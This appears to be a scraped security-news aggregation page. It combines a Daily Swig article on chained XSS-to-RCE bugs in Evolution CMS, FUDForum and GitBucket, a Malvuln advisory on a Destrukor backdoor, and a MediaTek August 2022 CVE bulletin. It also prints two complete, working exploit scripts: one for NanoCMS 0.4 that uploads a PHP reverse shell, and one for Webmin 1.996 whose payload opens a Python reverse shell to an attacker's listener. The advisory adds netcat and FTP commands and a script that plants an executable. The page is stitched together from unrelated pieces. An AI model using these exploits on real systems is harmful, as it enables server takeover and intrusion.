Evolution CMS, FUDForum, and GitBucket vulnerabilities chained for maximum impact

Evolution CMS, FUDForum, and GitBucket vulnerabilities chained for maximum impact

Researchers have released details on a trio of cross-site scripting (XSS) vulnerabilities in popular open source apps that could lead to remote code execution (RCE).

The security bugs, found by a research team from PT Swarm, were discovered in web development applications Evolution CMS, FUDForum, and GitBucket.

A traditional XSS attack allows the attacker’s JavaScript code to be executed in the victim user’s browser, opening the door to cookie theft, redirection to a phishing site, and much more.

Web security researcher Aleksey Solovev told The Daily Swig that this research, detailed in PT Swarm’s blog, relates to how “the combination of the discovered possibility of conducting an XSS attack and the built-in file manager (or executing a SQL query) in the administrator panel can lead to a complete compromise of the system”.

**Triple threat**

The first vulnerability, in Evolution CMS v3.1.8, could allow an attacker to carry out a reflected XSS attack in several places in the admin panel.

“An attacker could try to force a system administrator to follow a malicious link through social engineering, which would lead to the execution of malicious JavaScript code in the browser of the attacked,” Solovev told The Daily Swig.

“The consequence would be a complete compromise of the system by overwriting the executable file using the built-in file manager.”

Read more of the latest web security research here

A second flaw, found in FUDforum v3.1.1, could potentially allow a malicious actor to carry out a stored XSS attack in the name of the attached file in private messages.

“An attacker could send a private message to an administrator with a malicious payload in the name of the attached file,” said Solovev.

“When this message is read by the administrator, his browser would execute the JavaScript code and, using the built-in file manager, an executable file would be created that would allow the attacker to execute commands on the server.”

Finally, in GitBucket v4.37.1, a security bug was discovered that could enable an attacker to carry out a stored XSS attack in “several places”, according to Solovev.

An attacker had to create an issue in a public repository and inject a JavaScript code into the name of the assignment.

This event would be displayed in the general feed and the attacker’s profile. It was in these places that the insecure display of the task name with a malicious load was present, which led to the execution of JavaScript code in the browser of everyone who viewed these pages.

“In the admin panel, it was possible to execute SQL code based on the H2 Database Engine, for which there is already an exploit that allows you to execute a command on the server,” Solovev explained.

“Putting everything together, an attacker could attack the administrator and gain the ability to execute commands on the server.”

**Patches released**

All three vulnerabilities are pending a CVE but have been patched by the maintainers of the projects, Solovev told The Daily Swig.

The researcher added that the main difficulty in discovering these flaws was to find the possibility of conducting an XSS attack.

“The rest of the steps were easier because they had public exploits for legitimate functionality in the form of a file manager in the admin panel,” he explained.

More information about the vulnerabilities and technical detail on the exploit can be found in PT Swarm’s blog.

YOU MAY ALSO LIKE GitHub Actions workflow flaws provided write access to projects including Logstash

Trio of XSS bugs in open source web apps could lead to complete system compromise

PyroCMS v3.9 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities.

CVE-2022-35118: AARO-Bugs/AARO-CVE-List.md at master · Accenture/AARO-Bugs

NanoCMS version 0.4 suffers from an authenticated remote code execution vulnerability.

    # Exploit Title: NanoCMS v0.4 - Remote Code Execution (RCE) (Authenticated)# Date: 2022-07-26# Exploit Auuthor: p1ckzi# Vendor Homepage: https://github.com/kalyan02/NanoCMS# Version: NanoCMS v0.4# Tested on: Linux Mint 20.3# CVE: N/A## Description:# this script uploads a php reverse shell to the target.# NanoCMS does not sanitise the data of an authenticated user while creating# webpages. pages are saved with .php extensions by default, allowing an# authenticated attacker access to the underlying system:# https://github.com/ishell/Exploits-Archives/blob/master/2009-exploits/0904-exploits/nanocms-multi.txt#!/usr/bin/env python3import argparseimport bs4import errnoimport reimport requestsimport secretsimport sysdef arguments():    parser = argparse.ArgumentParser(        formatter_class=argparse.RawDescriptionHelpFormatter,        description=f"{sys.argv[0]} exploits authenticated file upload"        "\nand remote code execution in NanoCMS v0.4",        epilog=f"examples:"        f"\n\tpython3 {sys.argv[0]} http://10.10.10.10/ rev.php"        f"\n\tpython3 {sys.argv[0]} http://hostname:8080 rev-shell.php -a"        f"\n\t./{sys.argv[0]} https://10.10.10.10 rev-shell -n -e -u 'user'"    )    parser.add_argument(        "address", help="schema/ip/hostname, port, sub-directories"        " to the vulnerable NanoCMS server"    )    parser.add_argument(        "file", help="php file to upload"    )    parser.add_argument(        "-u", "--user", help="username", default="admin"    )    parser.add_argument(        "-p", "--passwd", help="password", default="demo"    )    parser.add_argument(        "-e", "--execute", help="attempts to make a request to the uploaded"        " file (more useful if uploading a reverse shell)",        action="store_true", default=False    )    parser.add_argument(        "-a", "--accessible", help="turns off features"        " which may negatively affect screen readers",        action="store_true", default=False    )    parser.add_argument(        "-n", "--no-colour", help="removes colour output",        action="store_true", default=False    )    arguments.option = parser.parse_args()# settings for terminal output defined by user in term_settings().class settings():    # colours.    c0 = ""    c1 = ""    c2 = ""    # information boxes.    i1 = ""    i2 = ""    i3 = ""    i4 = ""# checks for terminal setting flags supplied by arguments().def term_settings():    if arguments.option.accessible:        small_banner()    elif arguments.option.no_colour:        settings.i1 = "[+] "        settings.i2 = "[!] "        settings.i3 = "[i] "        settings.i4 = "$ "        banner()    elif not arguments.option.accessible or arguments.option.no_colour:        settings.c0 = "\u001b[0m"       # reset.        settings.c1 = "\u001b[38;5;1m"  # red.        settings.c2 = "\u001b[38;5;2m"  # green.        settings.i1 = "[+] "        settings.i2 = "[!] "        settings.i3 = "[i] "        settings.i4 = "$ "        banner()    else:        print("something went horribly wrong!")        sys.exit()# default terminal banner (looks prettier when run lol)def banner():    print(        "\n                                                  .__           .__"        "  .__   "        "\n  ____ _____    ____   ____   ____   _____   _____|  |__   ____ |  "        "| |  |  "        "\n /    \\__   \\  /    \\ /  _ \\_/ ___\\ /     \\ /  ___/  |  \\_/ "        "__ \\|  | |  |  "        "\n|   |  \\/ __ \\|   |  (  <_> )  \\___|  Y Y  \\___  \\|   Y  \\  _"        "__/|  |_|  |__"        "\n|___|  (____  /___|  /\\____/ \\___  >__|_|  /____  >___|  /\\___  "        ">____/____/"        "\n     \\/     \\/     \\/            \\/      \\/     \\/     \\/   "        "  \\/"    )def small_banner():    print(        f"{sys.argv[0]}"        "\nNanoCMS authenticated file upload and rce..."    )# appends a '/' if not supplied at the end of the address.def address_check(address):    check = re.search('/$', address)    if check is not None:        print('')    else:        arguments.option.address += "/"# creates a new filename for each upload.# errors occur if the filename is the same as a previously uploaded one.def random_filename():    random_filename.name = secrets.token_hex(4)# note: after a successful login, credentials are saved, so further reuse# of the script will most likely not require correct credentials.def login(address, user, passwd):    post_header = {        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) "        "Gecko/20100101 Firefox/91.0",        "Accept": "text/html,application/xhtml+xml,"        "application/xml;q=0.9,image/webp,*/*;q=0.8",        "Accept-Language": "en-US,en;q=0.5",        "Accept-Encoding": "gzip, deflate",        "Content-Type": "application/x-www-form-urlencoded",        "Content-Length": "",        "Connection": "close",        "Referer": f"{arguments.option.address}data/nanoadmin.php",        "Cookie": "PHPSESSID=46ppbqohiobpvvu6olm51ejlq5",        "Upgrade-Insecure-Requests": "1",    }    post_data = {        "user": f"{user}",        "pass": f"{passwd}"    }    url_request = requests.post(        address + 'data/nanoadmin.php?',        headers=post_header,        data=post_data,        verify=False,        timeout=30    )    signin_error = url_request.text    if 'Error : wrong Username or Password' in signin_error:        print(            f"{settings.c1}{settings.i2}could "            f"sign in with {arguments.option.user}/"            f"{arguments.option.passwd}.{settings.c0}"        )        sys.exit(1)    else:        print(            f"{settings.c2}{settings.i1}logged in successfully."            f"{settings.c0}"        )def exploit(address, file, name):    with open(arguments.option.file, 'r') as file:        file_contents = file.read().rstrip()    post_header = {        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) "        "Gecko/20100101 Firefox/91.0",        "Accept": "text/html,application/xhtml+xml,"        "application/xml;q=0.9,image/webp,*/*;q=0.8",        "Accept-Language": "en-US,en;q=0.5",        "Accept-Encoding": "gzip, deflate",        "Content-Type": "application/x-www-form-urlencoded",        "Content-Length": "",        "Connection": "close",        "Referer": f"{arguments.option.address}data/nanoadmin.php?action="        "addpage",        "Cookie": "PHPSESSID=46ppbqohiobpvvu6olm51ejlq5",        "Upgrade-Insecure-Requests": "1",    }    post_data = {        "title": f"{random_filename.name}",        "save": "Add Page",        "check_sidebar": "sidebar",        "content": f"{file_contents}"    }    url_request = requests.post(        address + 'data/nanoadmin.php?action=addpage',        headers=post_header,        data=post_data,        verify=False,        timeout=30    )    if url_request.status_code == 404:        print(            f"{settings.c1}{settings.i2}{arguments.option.address} could "            f"not be uploaded.{settings.c0}"        )        sys.exit(1)    else:        print(            f"{settings.c2}{settings.i1}file posted."            f"{settings.c0}"        )    print(        f"{settings.i3}if successful, file location should be at:"        f"\n{address}data/pages/{random_filename.name}.php"    )def execute(address, file, name):    print(            f"{settings.i3}making web request to uploaded file."    )    print(            f"{settings.i3}check listener if reverse shell uploaded."        )    url_request = requests.get(        address + f'data/pages/{random_filename.name}.php',        verify=False    )    if url_request.status_code == 404:        print(            f"{settings.c1}{settings.i2}{arguments.option.file} could "            f"not be found."            f"\n{settings.i2}antivirus may be blocking your upload."            f"{settings.c0}"        )    else:        sys.exit()def main():    try:        arguments()        term_settings()        address_check(arguments.option.address)        random_filename()        if arguments.option.execute:            login(                arguments.option.address,                arguments.option.user,                arguments.option.passwd            )            exploit(                arguments.option.address,                arguments.option.file,                random_filename.name,            )            execute(                arguments.option.address,                arguments.option.file,                random_filename.name,            )        else:            login(                arguments.option.address,                arguments.option.user,                arguments.option.passwd            )            exploit(                arguments.option.address,                arguments.option.file,                random_filename.name,            )    except KeyboardInterrupt:        print(f"\n{settings.i3}quitting.")        sys.exit()    except requests.exceptions.Timeout:        print(            f"{settings.c1}{settings.i2}the request timed out "            f"while attempting to connect.{settings.c0}"        )        sys.exit()    except requests.ConnectionError:        print(            f"{settings.c1}{settings.i2}could not connect "            f"to {arguments.option.address}{settings.c0}"        )        sys.exit()    except FileNotFoundError:        print(            f"{settings.c1}{settings.i2}{arguments.option.file} "            f"could not be found.{settings.c0}"        )    except (        requests.exceptions.MissingSchema,        requests.exceptions.InvalidURL,        requests.exceptions.InvalidSchema    ):        print(            f"{settings.c1}{settings.i2}a valid schema and address "            f"must be supplied.{settings.c0}"        )        sys.exit()if __name__ == "__main__":    main()

NanoCMS 0.4 Remote Code Execution

Backdoor.Win32.Destrukor.20 malware suffers from authentication bypass and code execution vulnerabilities.

**Backdoor.Win32.Destrukor.20 MVID-2022-0626 Authentication Bypass / Code Execution**

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/c790749f851d48e66e7d59cc2e451956.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Destrukor.20Vulnerability: Authentication Bypass Description: The malware listens on TCP port 6969. However, after sending a specific cmd "rozmiar" the backdoor returns "moznasciagac" in Polish "you can download" and port 21 opens. Third-party attackers who can reach infected systems can logon using any username/password combination. Intruders may then upload executables using ftp PASV, STOR commands, this can result in remote code execution.Family: DestrukorType: PE32MD5: c790749f851d48e66e7d59cc2e451956Dropped files: sys32.exeVuln ID: MVID-2022-0626Disclosure: 07/30/2022Exploit/PoC:C:\>nc64.exe 192.168.18.125 6969rozmiar moznasciagacC:\>nc64.exe 192.168.18.125 21220 ICS FTP Server ready.USER malvuln331 Password required for malvuln.PASS malvuln230 User malvuln logged in.SYST215 UNIX Type: L8 Internet Component SuiteCDUP \250 CWD command successful. "C:/" is current directory.MKD HATE257 'C:\HATE': directory created.PASV227 Entering Passive Mode (192,168,18,125,232,131).STOR DOOM.exe150 Opening data connection for DOOM.exe.226 File received okfrom socket import *MALWARE_HOST="192.168.18.125"PORT=59523DOOM="DOOM.exe"def doit():    s=socket(AF_INET, SOCK_STREAM)    s.connect((MALWARE_HOST, PORT))    f = open(DOOM, "rb")    EXE = f.read()    s.send(EXE)    while EXE:        s.send(EXE)        EXE=f.read()    s.close()    print("By Malvuln");if __name__=="__main__":    doit()Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Destrukor.20 MVID-2022-0626 Authentication Bypass / Code Execution

Webmin version 1.996 suffers from an authenticated remote code execution vulnerability.

    # Exploit Title: Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)# Date: 2022-07-25# Exploit Author: Emir Polat# Technical analysis: https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165# Vendor Homepage: https://www.webmin.com/# Software Link: https://www.webmin.com/download.html# Version: < 1.997# Tested On: Version 1.996 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64)# CVE: CVE-2022-36446import argparseimport requestsfrom bs4 import BeautifulSoupdef login(args):    global session    global sysUser    session = requests.Session()    loginUrl = f"{args.target}:10000/session_login.cgi"    infoUrl = f"{args.target}:10000/sysinfo.cgi"    username = args.username    password = args.password    data = {'user': username, 'pass': password}    login = session.post(loginUrl, verify=False, data=data, cookies={'testing': '1'})    sysInfo = session.post(infoUrl, verify=False, cookies={'sid' : session.cookies['sid']})    bs = BeautifulSoup(sysInfo.text, 'html.parser')    sysUser = [item["data-user"] for item in bs.find_all() if "data-user" in item.attrs]    if sysUser:        return True    else:        return Falsedef exploit(args):    payload = f"""    1337;$(python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{args.listenip}",{args.listenport}));    os.dup2(s.fileno(),0);    os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")');    """    updateUrl = f"{args.target}:10000/package-updates"    exploitUrl = f"{args.target}:10000/package-updates/update.cgi"    exploitData = {'mode' : 'new', 'search' : 'ssh', 'redir' : '', 'redirdesc' : '', 'u' : payload, 'confirm' : 'Install+Now'}    if login(args):        print("[+] Successfully Logged In !")        print(f"[+] Session Cookie => sid={session.cookies['sid']}")        print(f"[+] User Found  => {sysUser[0]}")        res = session.get(updateUrl)        bs = BeautifulSoup(res.text, 'html.parser')        updateAccess = [item["data-module"] for item in bs.find_all() if "data-module" in item.attrs]        if updateAccess[0] == "package-updates":            print(f"[+] User '{sysUser[0]}' has permission to access <<Software Package Updates>>")            print(f"[+] Exploit starting ... ")            print(f"[+] Shell will spawn to {args.listenip} via port {args.listenport}")            session.headers.update({'Referer'  : f'{args.target}:10000/package-updates/update.cgi?xnavigation=1'})            session.post(exploitUrl, data=exploitData)        else:            print(f"[-] User '{sysUser[0]}' unfortunately hasn't permission to access <<Software Package Updates>>")    else:        print("[-] Login Failed !")if __name__ == '__main__':    parser = argparse.ArgumentParser(description="Webmin < 1.997 - Remote Code Execution (Authenticated)")    parser.add_argument('-t', '--target', help='Target URL, Ex: https://webmin.localhost', required=True)    parser.add_argument('-u', '--username', help='Username For Login', required=True)    parser.add_argument('-p', '--password', help='Password For Login', required=True)    parser.add_argument('-l', '--listenip', help='Listening address required to receive reverse shell', required=True)    parser.add_argument('-lp','--listenport', help='Listening port required to receive reverse shell', required=True)    parser.add_argument("-s", '--ssl', help="Use if server support SSL.", required=False)    args = parser.parse_args()    exploit(args)

Webmin 1.996 Remote Code Execution

In scp, there is a possible undefined behavior due to incorrect error handling. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS06988728; Issue ID: ALPS06988728.

**August 2022 Product Security Bulletin**

Published 2022-08-01

The MediaTek Product Security Bulletin contains details of security vulnerabilities affecting MediaTek Smartphone, Tablet, AIoT, Smart display, Smart platform, OTT and NBIoT chipsets. Device OEMs have been notified of all the issues and the corresponding security patches for at least two months before publication.

The severity of the identified vulnerabilities was conducted based on the Common Vulnerability Scoring System version 3.1 (CVSS v3.1).

****Summary****

Severity

**CVEs**

High

CVE-2022-26437

Medium

CVE-2022-21789, CVE-2022-21790, CVE-2022-21791, CVE-2022-21792, CVE-2022-26426, CVE-2022-26427, CVE-2022-26428, CVE-2022-26429, CVE-2022-21788, CVE-2022-26430, CVE-2022-26431, CVE-2022-26432, CVE-2022-26433, CVE-2022-26434, CVE-2022-26435, CVE-2022-26436, CVE-2022-26438, CVE-2022-26439, CVE-2022-26440, CVE-2022-26441, CVE-2022-26442, CVE-2022-26443, CVE-2022-26444, CVE-2022-26445

****Details****

CVE

**CVE-2022-26437**

Title

Out-of-bounds write in httpclient

Severity

High

Vulnerability Type

EoP

CWE

CWE-787 Out-of-bounds Write

Description

In httpclient, there is a possible out of bounds write due to uninitialized data. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT2621, MT2625

Affected Software Versions

NBIOT SDK V2.8.1

CVE

**CVE-2022-21789**

Title

Concurrent execution using shared resource with improper synchronization ('race condition') in audio ipi

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')

Description

In audio ipi, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6779, MT6781, MT6785, MT6853, MT6853T, MT6873, MT6875, MT6877, MT6879, MT6883, MT6885, MT6889, MT6891, MT6893, MT6895, MT6983, MT6985, MT8791, MT8797, MT8798

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-21790**

Title

Improper input validation in camera isp

Severity

Medium

Vulnerability Type

ID

CWE

CWE-20 Improper Input Validation

Description

In camera isp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6873, MT6877, MT6893

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-21791**

Title

Improper input validation in camera isp

Severity

Medium

Vulnerability Type

ID

CWE

CWE-20 Improper Input Validation

Description

In camera isp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6873, MT6877, MT6885, MT6893

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-21792**

Title

Improper input validation in camera isp

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In camera isp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6853T, MT6873, MT6875, MT6877, MT6883, MT6885, MT6889, MT6893

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-26426**

Title

Improper input validation in camera isp

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In camera isp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6873, MT6877, MT6893, MT8167, MT8167S, MT8168, MT8175, MT8185, MT8362A, MT8365, MT8385, MT8666, MT8675, MT8765, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-26427**

Title

Improper input validation in camera isp

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In camera isp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6873, MT6877, MT6893

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-26428**

Title

Concurrent execution using shared resource with improper synchronization ('race condition') in video codec

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')

Description

In video codec, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6739, MT6761, MT6765, MT6771, MT8163, MT8167, MT8173, MT8183, MT8362A, MT8385, MT8695

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-26429**

Title

Improper access control in cta

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-284 Improper Access Control

Description

In cta, there is a possible way to write permission usage records of an app due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6580, MT6735, MT6739, MT6757, MT6761, MT6762, MT6763, MT6765, MT6768, MT6769, MT6771, MT6779, MT6781, MT6785, MT6833, MT6853, MT6855, MT6873, MT6875, MT6877, MT6879, MT6883, MT6885, MT6889, MT6893, MT6895, MT6983, MT8168, MT8173, MT8185, MT8321, MT8365, MT8385, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-21788**

Title

Detection of error condition without action in scp

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-390 Detection of Error Condition Without Action

Description

In scp, there is a possible undefined behavior due to incorrect error handling. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6879, MT6895, MT6983

Affected Software Versions

Android 12.0

CVE

**CVE-2022-26430**

Title

Access of resource using incompatible type ('type confusion') in mailbox

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-843 Access of Resource Using Incompatible Type ('Type Confusion')

Description

In mailbox, there is a possible out of bounds write due to type confusion. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6873, MT6877, MT6879, MT6885, MT6893, MT6895, MT6983, MT8185, MT8321, MT8385, MT8532, MT8666, MT8675, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 11.0, 12.0 or Yocto 3.1, 3.3

CVE

**CVE-2022-26431**

Title

Improper input validation in mailbox

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In mailbox, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6873, MT6877, MT6879, MT6885, MT6893, MT6895, MT6983, MT8185, MT8321, MT8385, MT8532, MT8666, MT8675, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 11.0, 12.0 or Yocto 3.1, 3.3

CVE

**CVE-2022-26432**

Title

Improper input validation in mailbox

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In mailbox, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6873, MT6877, MT6879, MT6885, MT6893, MT6895, MT6983, MT8185, MT8321, MT8385, MT8532, MT8666, MT8675, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 11.0, 12.0 or Yocto 3.1, 3.3

CVE

**CVE-2022-26433**

Title

Access of resource using incompatible type ('type confusion') in mailbox

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-843 Access of Resource Using Incompatible Type ('Type Confusion')

Description

In mailbox, there is a possible out of bounds write due to type confusion. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6873, MT6877, MT6879, MT6885, MT6893, MT6895, MT6983, MT8167, MT8167S, MT8168, MT8173, MT8175, MT8185, MT8321, MT8362A, MT8365, MT8385, MT8532, MT8666, MT8675, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 11.0, 12.0 or Yocto 3.1, 3.3

CVE

**CVE-2022-26434**

Title

Improper input validation in mailbox

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In mailbox, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6873, MT6877, MT6879, MT6885, MT6893, MT6895, MT6983, MT8167, MT8167S, MT8168, MT8173, MT8175, MT8185, MT8321, MT8362A, MT8365, MT8385, MT8532, MT8666, MT8675, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 11.0, 12.0 or Yocto 3.1, 3.3

CVE

**CVE-2022-26435**

Title

Access of resource using incompatible type ('type confusion') in mailbox

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-843 Access of Resource Using Incompatible Type ('Type Confusion')

Description

In mailbox, there is a possible out of bounds write due to type confusion. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6873, MT6877, MT6879, MT6885, MT6893, MT6895, MT6983, MT8167, MT8167S, MT8168, MT8173, MT8175, MT8185, MT8321, MT8362A, MT8365, MT8385, MT8532, MT8666, MT8675, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 11.0, 12.0 or Yocto 3.1, 3.3

CVE

**CVE-2022-26436**

Title

Improper input validation in emi mpu

Severity

Medium

Vulnerability Type

ID

CWE

CWE-20 Improper Input Validation

Description

In emi mpu, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6855, MT6879, MT6895, MT6983

Affected Software Versions

Android 12.0

CVE

**CVE-2022-26438**

Title

Improper input validation in wifi driver

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In wifi driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT7603, MT7610, MT7612, MT7613, MT7615, MT7620, MT7622, MT7628, MT7629, MT7915, MT7916, MT7986, MT8981

Affected Software Versions

7.6.2.3

CVE

**CVE-2022-26439**

Title

Improper input validation in wifi driver

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In wifi driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT7603, MT7610, MT7612, MT7613, MT7615, MT7620, MT7622, MT7628, MT7629, MT7915, MT7916, MT7986, MT8981

Affected Software Versions

7.6.2.3

CVE

**CVE-2022-26440**

Title

Improper input validation in wifi driver

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In wifi driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT7603, MT7610, MT7612, MT7613, MT7615, MT7620, MT7622, MT7628, MT7629, MT7915, MT7916, MT7986, MT8981

Affected Software Versions

7.6.2.3

CVE

**CVE-2022-26441**

Title

Improper input validation in wifi driver

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In wifi driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT7603, MT7610, MT7612, MT7613, MT7615, MT7620, MT7622, MT7628, MT7629, MT7915, MT7916, MT7986, MT8981

Affected Software Versions

7.6.2.3

CVE

**CVE-2022-26442**

Title

Improper input validation in wifi driver

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In wifi driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT7603, MT7610, MT7612, MT7613, MT7615, MT7620, MT7622, MT7628, MT7629, MT7915, MT7916, MT7986, MT8981

Affected Software Versions

7.6.2.3

CVE

**CVE-2022-26443**

Title

Improper input validation in wifi driver

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In wifi driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT7603, MT7610, MT7612, MT7613, MT7615, MT7620, MT7622, MT7628, MT7629, MT7915, MT7916, MT7986, MT8981

Affected Software Versions

7.6.2.3

CVE

**CVE-2022-26444**

Title

Improper input validation in wifi driver

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In wifi driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT7603, MT7610, MT7612, MT7613, MT7615, MT7620, MT7622, MT7628, MT7629, MT7915, MT7916, MT7986, MT8981

Affected Software Versions

7.6.2.3

CVE

**CVE-2022-26445**

Title

Improper input validation in wifi driver

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In wifi driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT7603, MT7610, MT7612, MT7613, MT7615, MT7620, MT7622, MT7628, MT7629, MT7915, MT7916, MT7986, MT8981

Affected Software Versions

7.6.2.3

****Vulnerability Type Definition****

Abbreviation

**Definition**

RCE

Remote Code Execution

EoP

Elevation of Privilege

ID

Information Disclosure

DoS

Denial of Service

N/A

Classification not available

****Versions****

**Version**

**Date**

**Description**

1.0

August 1, 2022

Bulletin published.

****Notes****

Information above is generated only at the time of creation of this Security Bulletin. The list of affected chipsets could be not complete. For any further information, device OEMs can reach your MediaTek contact person if needed.

If you want to report a security vulnerability in MediaTek chipsets or products, please go to Report Security Vulnerability page on MediaTek website.

CVE-2022-21788: August 2022

